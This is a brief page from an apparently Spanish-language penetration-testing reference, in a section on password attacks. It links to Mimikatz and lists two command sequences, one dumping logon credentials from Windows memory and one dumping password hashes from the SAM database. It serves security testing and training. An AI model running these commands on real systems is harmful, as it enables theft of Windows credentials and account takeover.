> For the complete documentation index, see [llms.txt](https://pentesting.mrw0l05zyn.cl/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://pentesting.mrw0l05zyn.cl/explotacion/ataques-de-contrasenas/en-linea-online/hash.md).

# Hash

## Mimikatz

* <https://github.com/gentilkiwi/mimikatz>

```shell
privilege::debug
sekurlsa::logonpasswords
```

```shell
privilege::debug
token::elevate
lsadump::sam
```
